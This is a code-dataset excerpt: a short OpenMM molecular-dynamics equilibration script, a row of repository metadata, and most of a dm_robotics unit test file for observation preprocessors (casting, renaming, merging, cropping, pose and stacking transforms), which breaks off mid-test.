from sys import stdout
import os
import time
import numpy as np
import argparse
from equil import setup_sim, dynamix
parser = argparse.ArgumentParser(description='equilibrate structures')
parser.add_argument('--sys', type=str, help='system pdb preface')
parser.add_argument('--pdb', type=str, help='IC pdb')
parser.add_argument('--nmin', type=int, help='number of minimization steps', default=50)
parser.add_argument('--nstep', type=int, help='number of steps')
args = parser.parse_args()
systm = args.sys
ns = args.nstep
# load initial parameters and geometry
prmtop = app.AmberPrmtopFile(systm + '.prmtop')
pdb = app.PDBFile(args.pdb)
# eq temp
temp = 300.0
# timestep
ts = 2.0
qs = pdb.positions
top = pdb.topology
unit_cell = top.getUnitCellDimensions()
box = unit_cell*np.eye(3)
# run it!
sim = setup_sim(prmtop, temp, ts, qs, 'gpu', top, box)
dynamix(systm, sim, ns, prmtop, temp, ts, 'gpu', min=args.nmin)
| 26.538462 | 88 | 0.745894 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 215 | 0.207729 |
a81eba16cf9a55afaac7c0432d5bc776ba731b35 | 40,893 | py | Python | py/agentflow/preprocessors/observation_transforms_test.py | wx-b/dm_robotics | 5d407622360ccf7f0b4b50bcee84589e2cfd0783 | [
"Apache-2.0"
]
| 128 | 2021-09-08T18:39:39.000Z | 2022-03-27T11:29:05.000Z | py/agentflow/preprocessors/observation_transforms_test.py | wx-b/dm_robotics | 5d407622360ccf7f0b4b50bcee84589e2cfd0783 | [
"Apache-2.0"
]
| 7 | 2021-10-11T14:26:17.000Z | 2022-03-15T17:26:45.000Z | py/agentflow/preprocessors/observation_transforms_test.py | LaudateCorpus1/dm_robotics | 647bc810788c74972c1684a8d2e4d2dfd2791485 | [
"Apache-2.0"
]
| 8 | 2021-09-08T18:25:49.000Z | 2022-02-21T23:45:16.000Z | # Copyright 2020 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# python3
"""Tests for observations_transforms."""
import copy
from typing import Mapping, Optional, Type
from absl.testing import absltest
from absl.testing import parameterized
import cv2
import dm_env
from dm_env import specs
from dm_robotics.agentflow import spec_utils
from dm_robotics.agentflow import testing_functions
from dm_robotics.agentflow.preprocessors import observation_transforms
from dm_robotics.agentflow.preprocessors import timestep_preprocessor
from dm_robotics.transformations import transformations as tr
import numpy as np
_DEFAULT_TYPE = np.float64
def scalar_array_spec(name: str, dtype: Type[np.floating] = _DEFAULT_TYPE):
return specs.Array(shape=(), dtype=dtype, name=name)
@parameterized.parameters(
(observation_transforms.CastPreprocessor, float, float, float),
(observation_transforms.CastPreprocessor, np.float32, float,
float),
(observation_transforms.CastPreprocessor, np.float64, float,
float),
(observation_transforms.CastPreprocessor, float, np.float32,
np.float32),
(observation_transforms.CastPreprocessor, np.float32, np.float32,
np.float32),
(observation_transforms.CastPreprocessor, np.float64, np.float32,
np.float32),
(observation_transforms.CastPreprocessor, float, np.float64,
np.float64),
(observation_transforms.CastPreprocessor, np.float32, np.float64,
np.float64),
(observation_transforms.CastPreprocessor, np.float64, np.float64,
np.float64),
(observation_transforms.DowncastFloatPreprocessor, float, float,
float),
(observation_transforms.DowncastFloatPreprocessor, np.float32,
float, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float64,
float, float),
(observation_transforms.DowncastFloatPreprocessor, float,
np.float32, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float32,
np.float32, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float64,
np.float32, np.float32),
(observation_transforms.DowncastFloatPreprocessor, float,
np.float64, float),
(observation_transforms.DowncastFloatPreprocessor, np.float32,
np.float64, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float64,
np.float64, np.float64),
(observation_transforms.DowncastFloatPreprocessor, np.float128,
np.float64, np.float64),
# Non-floating point types should not be interefered with.
(observation_transforms.DowncastFloatPreprocessor, np.int32,
np.float64, np.int32),
)
class CastAndDowncastPreprocessorTest(absltest.TestCase):
def testCastPreprocessor_Array(
self, processor_type: timestep_preprocessor.TimestepPreprocessor,
src_type: Type[np.number], transform_type: Type[np.number],
expected_type: Type[np.number]):
# Arrange:
name = testing_functions.random_string(3)
processor = processor_type(transform_type)
input_observation_spec = {
name: specs.Array(shape=(2,), dtype=src_type, name=name),
}
expected_observation_spec = {
name: specs.Array(shape=(2,), dtype=expected_type, name=name),
}
input_reward_spec = scalar_array_spec(dtype=src_type,
name='reward')
expected_reward_spec = scalar_array_spec(dtype=expected_type,
name='reward')
input_discount_spec = scalar_array_spec(dtype=src_type,
name='discount')
expected_discount_spec = scalar_array_spec(dtype=expected_type,
name='discount')
input_timestep_spec = spec_utils.TimeStepSpec(
observation_spec=input_observation_spec,
reward_spec=input_reward_spec,
discount_spec=input_discount_spec)
input_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=np.random.choice(list(dm_env.StepType)),
reward=src_type(0.1),
discount=src_type(0.2),
observation={name: np.asarray([0.3, 0.4], dtype=src_type)},
pterm=0.1,
result=None)
# Act:
spec_utils.validate_timestep(input_timestep_spec, input_timestep)
output_timestep_spec = processor.setup_io_spec(input_timestep_spec)
# Assert:
expected_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=input_timestep.step_type,
reward=expected_type(0.1),
discount=expected_type(0.2),
observation={name: np.asarray([0.3, 0.4], dtype=expected_type)},
pterm=input_timestep.pterm,
result=None)
self.assertEqual(output_timestep_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_timestep_spec.reward_spec, expected_reward_spec)
self.assertEqual(output_timestep_spec.discount_spec, expected_discount_spec)
output_timestep = processor.process(input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(output_timestep.observation[name],
expected_timestep.observation[name])
np.testing.assert_almost_equal(output_timestep.reward,
expected_timestep.reward)
np.testing.assert_almost_equal(output_timestep.discount,
expected_timestep.discount)
def testCastPreprocessor_BoundedArray(
self, processor_type: timestep_preprocessor.TimestepPreprocessor,
src_type: Type[np.number], transform_type: Type[np.number],
expected_type: Type[np.number]):
"""Same as previous test, but using BoundedArray specs."""
# Arrange:
name = testing_functions.random_string(3)
processor = processor_type(transform_type)
input_minimum = np.asarray([0.3, 0.4], dtype=src_type)
input_maximum = np.asarray([0.5, 0.6], dtype=src_type)
input_observation_spec = {
name:
specs.BoundedArray(
shape=(2,),
dtype=src_type,
minimum=input_minimum,
maximum=input_maximum,
name=name),
}
input_reward_spec = scalar_array_spec(name='reward', dtype=src_type)
input_discount_spec = scalar_array_spec(name='discount', dtype=src_type)
input_timestep_spec = spec_utils.TimeStepSpec(
observation_spec=input_observation_spec,
reward_spec=input_reward_spec,
discount_spec=input_discount_spec)
input_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=np.random.choice(list(dm_env.StepType)),
reward=src_type(0.1),
discount=src_type(0.2),
observation={name: np.asarray([0.4, 0.5], dtype=src_type)},
pterm=0.1,
result=None)
# Act:
spec_utils.validate_timestep(input_timestep_spec, input_timestep)
output_timestep_spec = processor.setup_io_spec(input_timestep_spec)
# Assert:
expected_minimum = np.asarray([0.3, 0.4], dtype=expected_type)
expected_maximum = np.asarray([0.5, 0.6], dtype=expected_type)
expected_output_observation_spec = {
name:
specs.BoundedArray(
shape=(2,),
dtype=expected_type,
minimum=expected_minimum,
maximum=expected_maximum,
name=name),
}
expected_output_reward_spec = scalar_array_spec(
name='reward', dtype=expected_type)
expected_output_discount_spec = scalar_array_spec(
name='discount', dtype=expected_type)
expected_output_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=input_timestep.step_type,
reward=expected_type(0.1),
discount=expected_type(0.2),
observation={name: np.asarray([0.4, 0.5], dtype=expected_type)},
pterm=input_timestep.pterm,
result=None)
self.assertEqual(
set(output_timestep_spec.observation_spec.keys()),
set(expected_output_observation_spec.keys()))
spec_utils.verify_specs_equal_bounded(
output_timestep_spec.observation_spec[name],
expected_output_observation_spec[name])
self.assertEqual(output_timestep_spec.reward_spec,
expected_output_reward_spec)
self.assertEqual(output_timestep_spec.discount_spec,
expected_output_discount_spec)
output_timestep = processor.process(input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(output_timestep.observation[name],
expected_output_timestep.observation[name])
np.testing.assert_almost_equal(output_timestep.reward,
expected_output_timestep.reward)
np.testing.assert_almost_equal(output_timestep.discount,
expected_output_timestep.discount)
def testCastPreprocessor_RewardArray(
self, processor_type: timestep_preprocessor.TimestepPreprocessor,
src_type: Type[np.number], transform_type: Type[np.number],
expected_type: Type[np.number]):
# Arrange:
name = testing_functions.random_string(3)
processor = processor_type(transform_type)
input_observation_spec = {
name: specs.Array(shape=(2,), dtype=src_type, name=name),
}
expected_observation_spec = {
name: specs.Array(shape=(2,), dtype=expected_type, name=name),
}
input_reward_spec = specs.Array(shape=(3,), dtype=src_type,
name='reward')
expected_reward_spec = specs.Array(
shape=(3,), dtype=expected_type, name='reward')
input_discount_spec = scalar_array_spec(dtype=src_type,
name='discount')
expected_discount_spec = scalar_array_spec(dtype=expected_type,
name='discount')
input_timestep_spec = spec_utils.TimeStepSpec(
observation_spec=input_observation_spec,
reward_spec=input_reward_spec,
discount_spec=input_discount_spec)
# Some test data that matches the src_type.
if np.issubdtype(src_type, np.floating):
numbers = (0.1, 0.2, 0.3, 0.4, 0.1)
elif np.issubdtype(src_type, np.integer):
numbers = (1, 2, 3, 4, 5)
else:
raise ValueError(
'Only ints and floats are currently supported.')
input_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=np.random.choice(list(dm_env.StepType)),
reward=numbers[0] * np.ones(shape=(3,), dtype=src_type),
discount=src_type(numbers[1]),
observation={name: np.asarray(numbers[2:4], dtype=src_type)},
pterm=numbers[4],
result=None)
# Act:
spec_utils.validate_timestep(input_timestep_spec, input_timestep)
output_timestep_spec = processor.setup_io_spec(input_timestep_spec)
# Assert:
expected_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=input_timestep.step_type,
reward=numbers[0] * np.ones(shape=(3,), dtype=expected_type),
discount=expected_type(numbers[1]),
observation={name: np.asarray(numbers[2:4], dtype=expected_type)},
pterm=input_timestep.pterm,
result=None)
self.assertEqual(output_timestep_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_timestep_spec.reward_spec, expected_reward_spec)
self.assertEqual(output_timestep_spec.discount_spec, expected_discount_spec)
output_timestep = processor.process(input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(output_timestep.observation[name],
expected_timestep.observation[name])
np.testing.assert_almost_equal(output_timestep.reward,
expected_timestep.reward)
np.testing.assert_almost_equal(output_timestep.discount,
expected_timestep.discount)
class RenameObservationsTest(absltest.TestCase):
def test_rename_observations(self):
preprocessor = observation_transforms.RenameObservations(
obs_mapping={'foo': 'pow', 'faw': 'biz'})
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
input_obs = {'foo': [1., 2.], 'bar': [3., 4.], 'faw': [5., 6.]}
input_timestep = dm_env.TimeStep(
step_type=dm_env.StepType.MID,
reward=_DEFAULT_TYPE(0.1),
discount=_DEFAULT_TYPE(0.8),
observation=input_obs)
# Setup expectations.
expected_output_spec = input_spec.replace(observation_spec={
'pow': specs.Array(shape=(2,), dtype=np.float64, name='pow'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'biz': specs.Array(shape=(2,), dtype=np.float64, name='biz'),
})
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
np.testing.assert_array_equal(output_timestep.observation['pow'], [1., 2.])
def test_failure_when_renaming_missing_observations(self):
preprocessor = observation_transforms.RenameObservations(
obs_mapping={'foo': 'pow', 'faw': 'biz'})
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
preprocessor.setup_io_spec(input_spec)
def test_failure_for_duplicate_rename_targets(self):
obs_mapping = {'foo': 'pow', 'bar': 'pow'}
# Initialization should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
observation_transforms.RenameObservations(obs_mapping)
def test_failure_for_conflicting_rename_targets(self):
# Create the spec and timestep.
preprocessor = observation_transforms.RenameObservations(
obs_mapping={'foo': 'pow', 'faw': 'bar'})
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
preprocessor.setup_io_spec(input_spec)
class MergeObservationsTest(absltest.TestCase):
def test_merge_observation(self):
preprocessor = observation_transforms.MergeObservations(
obs_to_merge=['foo', 'bar'], new_obs='baz')
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
input_obs = {'foo': [1., 2.], 'bar': [3., 4.], 'faw': [3., 4.]}
input_timestep = dm_env.TimeStep(
step_type=dm_env.StepType.MID,
reward=_DEFAULT_TYPE(0.1),
discount=_DEFAULT_TYPE(0.8),
observation=input_obs)
# Setup expectations.
expected_output_spec = input_spec.replace(observation_spec={
'baz': specs.Array(shape=(4,), dtype=np.float64, name='baz'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw')
})
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
np.testing.assert_array_equal(output_timestep.observation['baz'],
[1., 2., 3., 4.])
def test_failure_when_merging_missing_observation(self):
preprocessor = observation_transforms.MergeObservations(
obs_to_merge=['foo', 'bar'], new_obs='baz')
# Generate the input spec
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo')}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
preprocessor.setup_io_spec(input_spec)
def test_failure_for_conflicting_new_name(self):
preprocessor = observation_transforms.MergeObservations(
obs_to_merge=['foo', 'bar'], new_obs='faw')
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
preprocessor.setup_io_spec(input_spec)
class CropImageObservationTest(absltest.TestCase):
def setUp(self):
super().setUp()
self._input_obs_name = 'input_obs'
self._output_obs_name = 'output_obs'
# This has a shape of (4,5)
self._input_spec = testing_functions.random_array_spec(
shape=(4, 5, 3), dtype=float, name=self._input_obs_name)
self._input_observation_spec = {self._input_obs_name: self._input_spec}
self._input_obs_value = testing_functions.valid_value(self._input_spec)
self._input_timestep_spec = testing_functions.random_timestep_spec(
observation_spec=self._input_observation_spec)
self._input_timestep = testing_functions.random_timestep(
spec=self._input_timestep_spec,
observation={self._input_obs_name: self._input_obs_value})
spec_utils.validate_timestep(self._input_timestep_spec,
self._input_timestep)
def _get_expected_spec(self, value: np.ndarray):
return testing_functions.random_array_spec(
shape=value.shape, dtype=value.dtype, name=self._output_obs_name)
def testFullCrop(self):
"""Don't modify the input at all."""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=1.0,
crop_height_relative=1.0,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._input_spec.replace(name=self._output_obs_name),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation."""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.4,
crop_height_relative=0.75,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value[:3, :2]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testSquareCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation.
Leaving out the height parameter should default to a square crop.
"""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.4,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value[:2, :2]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testCropWithOffset(self):
"""Crop to the center of the observation."""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.6,
crop_height_relative=0.5,
x_offset_relative=0.5,
y_offset_relative=0.5)
expected_value = self._input_obs_value[1:3, 1:4]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testInvalidParams(self):
"""Ensure that invalid parameters cause Exceptions."""
# Zero width and height are invalid
with self.assertRaisesRegex(ValueError, 'zero'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.,
crop_height_relative=0.,
x_offset_relative=0.,
y_offset_relative=0.)
# Negative width is invalid
with self.assertRaisesRegex(ValueError, 'width must be between'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=-1.,
crop_height_relative=1.,
x_offset_relative=0.,
y_offset_relative=0.)
# Height > 1.0 is invalid
with self.assertRaisesRegex(ValueError, 'height must be between'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=1.,
crop_height_relative=1.5,
x_offset_relative=0.,
y_offset_relative=0.)
# Offset > 1.0 is invalid
with self.assertRaisesRegex(ValueError, 'offset must be between'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.6,
crop_height_relative=1.,
x_offset_relative=1.5,
y_offset_relative=0.)
class CropSquareAndResizeTest(absltest.TestCase):
def setUp(self):
super().setUp()
self._input_obs_name = 'input_obs'
self._output_obs_name = 'output_obs'
# This has a shape of (4,5)
self._input_spec = testing_functions.random_array_spec(
shape=(4, 5), dtype=float, name=self._input_obs_name)
self._input_observation_spec = {self._input_obs_name: self._input_spec}
self._input_obs_value = testing_functions.valid_value(self._input_spec)
self._input_timestep_spec = testing_functions.random_timestep_spec(
observation_spec=self._input_observation_spec)
self._input_timestep = testing_functions.random_timestep(
spec=self._input_timestep_spec,
observation={self._input_obs_name: self._input_obs_value})
spec_utils.validate_timestep(self._input_timestep_spec,
self._input_timestep)
def _get_expected_spec(self, value: np.ndarray):
return testing_functions.random_array_spec(
shape=value.shape, dtype=value.dtype, name=self._output_obs_name)
def testCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation."""
processor = observation_transforms.CropSquareAndResize(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.8,
side_length_pixels=4,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value[:4, :4]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testScaledCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation."""
processor = observation_transforms.CropSquareAndResize(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.8,
side_length_pixels=8,
x_offset_relative=0.0,
y_offset_relative=0.0,
interpolation=cv2.INTER_NEAREST)
# Nearest neighbor sampling should just duplicate the original pixels
expected_value = np.repeat(
np.repeat(self._input_obs_value[:4, :4], 2, axis=0), 2, axis=1)
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
class PoseRelativeTest(absltest.TestCase):
def _check_spec_float_unchanged(self, dtype):
preprocessor = observation_transforms.PoseRelativeToEpisodeStart(
pos_obs_name='pos', quat_obs_name='quat')
# Generate the input spec and input timestep
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=dtype, name='pos'),
'quat': specs.Array(shape=(4,), dtype=dtype, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
first_input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.FIRST)
# Setup expectations.
expected_output_spec = input_spec
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(first_input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
def test_spec_float32_unchanged(self):
self._check_spec_float_unchanged(dtype=np.float32)
def test_spec_float64_unchanged(self):
self._check_spec_float_unchanged(dtype=np.float64)
def test_initial_observations(self):
preprocessor = observation_transforms.PoseRelativeToEpisodeStart(
pos_obs_name='pos', quat_obs_name='quat')
# Generate the input spec and input timestep
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float64, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float64, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': [1.0, -1.5, 3.2],
'quat': tr.euler_to_quat([0.1, 0.2, 0.3])
}
first_input_timestep = testing_functions.random_timestep(
spec=input_spec, step_type=dm_env.StepType.FIRST, observation=input_obs)
# Setup expectations.
expected_output_spec = input_spec
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(first_input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
output_pos = output_timestep.observation['pos']
np.testing.assert_array_almost_equal(output_pos, [0., 0., 0.])
output_euler = tr.quat_to_euler(output_timestep.observation['quat'])
np.testing.assert_array_almost_equal(output_euler, [0., 0., 0.])
def test_relative_observations(self):
preprocessor = observation_transforms.PoseRelativeToEpisodeStart(
pos_obs_name='pos', quat_obs_name='quat')
# Generate the input spec and input timestep
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float64, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float64, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': np.array([1.0, -1.5, 3.2]),
'quat': tr.euler_to_quat([0.0, 0.0, 0.0])
}
first_input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.FIRST,
observation=input_obs)
preprocessor.setup_io_spec(input_spec)
preprocessor.process(first_input_timestep)
pos_offset = np.array([0.1, -0.2, -0.3])
input_obs = {
'pos': (input_obs['pos'] + pos_offset),
'quat': tr.euler_to_quat([0.2, 0.0, 0.0])
}
second_input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.MID,
observation=input_obs)
output_timestep = preprocessor.process(second_input_timestep)
output_pos = output_timestep.observation['pos']
np.testing.assert_array_almost_equal(output_pos, pos_offset)
output_euler = tr.quat_to_euler(output_timestep.observation['quat'])
np.testing.assert_array_almost_equal(output_euler, [0.2, 0., 0.])
class StackObservationsTest(parameterized.TestCase):
@parameterized.parameters(
(False, (4,), (12,)),
(True, (4,), (3, 4)),
(False, (1,), (3,)),
(True, (1,), (3, 1)),
(False, (4, 4), (12, 4)),
(True, (4, 4), (3, 4, 4)),
)
def test_stack_observations_spec(
self, add_leading_dim, input_shape, output_shape):
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=input_shape, dtype=np.float32, name='pos'),
}
input_spec = _build_unit_timestep_spec(
observation_spec=input_obs_spec)
# Generate the expected stacked output spec.
expected_output_obs_spec = {
'pos': specs.Array(shape=output_shape, dtype=np.float32, name='pos'),
}
expected_output_spec = _build_unit_timestep_spec(
observation_spec=expected_output_obs_spec)
preprocessor = observation_transforms.StackObservations(
obs_to_stack=['pos'],
stack_depth=3,
add_leading_dim=add_leading_dim)
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(expected_output_spec, output_spec)
@parameterized.parameters(
(False, (4,), (12,)),
(True, (4,), (3, 4)),
(False, (1,), (3,)),
(True, (1,), (3, 1)),
(False, (4, 4), (12, 4)),
(True, (4, 4), (3, 4, 4)),
)
def test_stack_observations(self, add_leading_dim, input_shape, output_shape):
# Generate the input spec.
input_obs_spec = {
'pos': specs.Array(shape=input_shape, dtype=np.float32, name='pos'),
}
input_spec = _build_unit_timestep_spec(
observation_spec=input_obs_spec)
preprocessor = observation_transforms.StackObservations(
obs_to_stack=['pos'],
stack_depth=3,
add_leading_dim=add_leading_dim)
preprocessor.setup_io_spec(input_spec)
input_pos = np.random.random(input_shape).astype(np.float32)
if add_leading_dim:
expected_output_pos = np.stack([input_pos for _ in range(3)], axis=0)
else:
expected_output_pos = np.concatenate(
[input_pos for _ in range(3)], axis=0)
input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.FIRST,
observation={'pos': input_pos,})
output_timestep = preprocessor.process(input_timestep)
output_pos = output_timestep.observation['pos']
np.testing.assert_allclose(expected_output_pos, output_pos)
np.testing.assert_allclose(expected_output_pos.shape, output_shape)
class AddObservationTest(absltest.TestCase):
def test_no_overwriting(self):
preprocessor = observation_transforms.AddObservation(
obs_name='pos',
obs_callable=lambda _: [1., 1., 1.])
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
error_msg = 'Observation pos already exists.'
with self.assertRaisesWithLiteralMatch(ValueError, error_msg):
preprocessor.setup_io_spec(input_spec)
def test_fail_to_run_obs_callable(self):
preprocessor = observation_transforms.AddObservation(
obs_name='new_obs',
obs_callable=lambda timestep: timestep.observation['not_exist'])
# Generate the input spec and input timestep.
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float32, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float32, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
# The obs_callable is trying to use an observation named `not_exist` not
# present.
with self.assertRaisesRegex(KeyError, 'not_exist'):
preprocessor.setup_io_spec(input_spec)
def test_add_obs_correctly(self):
preprocessor = observation_transforms.AddObservation(
obs_name='new_obs',
